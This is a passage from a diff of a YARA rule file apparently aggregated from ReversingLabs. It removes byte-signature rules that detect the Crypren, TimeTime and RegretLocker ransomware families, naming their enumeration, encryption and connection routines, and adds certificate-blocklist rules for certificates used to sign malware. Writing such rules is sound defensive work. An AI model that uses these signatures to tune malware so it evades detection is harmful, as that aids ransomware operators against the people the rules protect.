"7047d48782762e42544063fde6f2be62eb19f22853ea84abb5bce67c962da172" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14186-L14202" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2d181b9b517732f14d196c1a6c5661d8de4dbbfe6f120954dd3f9dcad00ff0fe" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Crypren" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_directories_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 - 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 - 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - } - $enum_directories_p2 = { - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 - 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 - } - $enum_directories_p3 = { - 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 - ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 90 83 7F ?? ?? 8B 5F ?? 72 ?? 8B 37 EB ?? 8B F7 83 7D ?? ?? 8D - 45 ?? 8B D3 0F 43 45 ?? 3B CB 0F 42 D1 85 D2 74 ?? 83 EA ?? 72 ?? 8D 9B ?? ?? ?? ?? - 8B 08 3B 0E 75 ?? 83 C0 ?? 83 C6 ?? 83 EA ?? 73 ?? 83 FA ?? 74 ?? 8A 08 3A 0E 75 ?? - 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA - ?? 74 ?? 8A 40 ?? 3A 46 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 8B 4D ?? 85 C0 75 ?? 3B - CB 73 ?? 83 C8 ?? EB ?? 33 C0 3B CB 0F 95 C0 85 C0 0F 94 C0 84 C0 75 ?? 8B 85 ?? ?? - ?? ?? 83 C7 ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? B3 ?? EB ?? 32 DB 68 - ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? - 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E - 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 33 FF C6 45 ?? ?? 83 7D ?? ?? 8D 45 ?? 6A - ?? 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? - 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B - 94 0D ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 39 BC 05 ?? ?? - ?? ?? 0F 85 ?? ?? ?? ?? F6 C2 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 03 C8 8D 45 ?? - 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? C6 45 ?? ?? 8B F0 - 85 C9 74 ?? 8B 11 FF 52 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B - 40 ?? FF D0 88 45 ?? 8D 45 ?? FF 75 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 76 ?? EB ?? 8D A4 24 - ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 0F 43 4D ?? 33 D2 - } - $encrypt_files_p2 = { - 0F BE 1C 30 8B C7 F7 75 ?? 8A 0C 0A 0F BE C1 03 C3 3D ?? ?? ?? ?? 7C ?? 25 ?? ?? ?? - ?? 79 ?? 48 0D ?? ?? ?? ?? 40 EB ?? 02 D9 0F B6 C3 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 46 83 C4 ?? 47 3B 75 ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? - ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 72 - ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D - ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C6 45 ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D - ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $enum_drives_p1 = { - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 - } - $enum_drives_p2 = { - E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 - 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D - 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 - ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Zhuzhou Lizhong Precision Manufacturing Technology Co., Ltd." and pe.signatures[i].serial=="2d:88:c0:af:1f:e2:60:99:61:c1:71:21:3c:03:bd:23" and 1683676800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "cb6ae82f-ac1e-528d-aa17-6dc14019793c" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14204-L14220" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1d2ffa7ec3559061432c2aff23f568cb580fb9093d0af7d8a6a0b91add89c9cc" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (( all of ($enum_directories_p*)) and ( all of ($enum_drives_p*)) and ( all of ($encrypt_files_p*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SG Internet" and pe.signatures[i].serial=="6e:7c:c1:76:06:2d:91:22:5c:fd:cb:df:5b:5f:0e:a5" and 1317945600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timetime : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE { meta: - description = "Yara rule that detects TimeTime ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "27bff941-01ce-5bf7-a9d8-d01d2db3bfd3" - date = "2022-02-21" - modified = "2022-02-21" + id = "60a3e63c-4f44-5c75-9928-69859d77af3e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara#L1-L75" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "43867dd793bc84e6f39ca2de1aff4047a742b295dc4df94cd337bd2ef89e4a62" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14222-L14240" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1dfb5959db6929643126a850de84e54a84d7197518cde475c802987721b71020" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TimeTime" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $rename_files = { - 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ?? - ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 00 DC 2A - } - $find_files = { - 00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ?? - ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C - ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? - ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 - ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 - 32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ?? - 00 00 DE ?? 06 0C 2B ?? 08 2A - } - $encrypt_folder = { - 00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C - 00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19 - 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ?? - 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C - ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? - ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A - } - $encrypt_files = { - 00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ?? - ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B - ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ?? - 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ?? - ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E - ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($encrypt_folder) and ($rename_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and (pe.signatures[i].serial=="00:ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" or pe.signatures[i].serial=="ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79") and 1527811200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Regretlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE { meta: - description = "Yara rule that detects RegretLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c4e515cc-b0c2-57b2-a230-619ec01ac8d4" - date = "2021-04-02" - modified = "2021-04-02" + id = "b88e0bbf-ab3a-51ac-8542-d4f92116f5e9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.RegretLocker.yara#L1-L206" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3927dfecacd74f60a169f82b68df5747daa90eaba77f24c5e730ce4c48d426a3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14242-L14258" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e8ebc5de081e2d1e653493a2d85699ebfb5227b7fab656468025c2043903f597" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "RegretLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 55 8B EC 8B 41 ?? 8B 55 ?? 3B C2 72 ?? 2B C2 56 8B 75 ?? 3B C6 0F 42 F0 83 79 ?? ?? - 72 ?? 8B 09 56 03 CA 51 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 5E 5D C2 ?? ?? E8 ?? - ?? ?? ?? CC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 53 - 56 57 50 E8 ?? ?? ?? ?? 83 65 ?? ?? 50 E8 ?? ?? ?? ?? 83 4D ?? ?? 8A D8 59 59 8D 4D - ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? - C7 45 ?? ?? ?? ?? ?? 8B CC 6A ?? 83 61 ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 - 19 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8B 8D ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 6A ?? 5B 3B CB C6 45 ?? ?? 0F 43 C2 80 78 ?? - ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? - 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB - 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 84 - } - $remote_connection_p2 = { - 8D 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 84 C0 75 ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 3B FB 8D B5 ?? ?? ?? ?? 8B 9D - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F 43 C3 83 FF ?? 0F 43 F3 0F 43 D3 33 C9 8A 40 ?? 3A - 46 ?? 0F BE 42 ?? 0F 94 C1 3B C8 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? - ?? 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? ?? 74 ?? 32 DB EB ?? B3 ?? F6 - 45 ?? ?? 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5F 6A ?? 33 DB 89 BD - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? - 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 83 FE ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 84 C0 74 ?? 6A ?? 5E 83 EC ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? - ?? ?? 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? 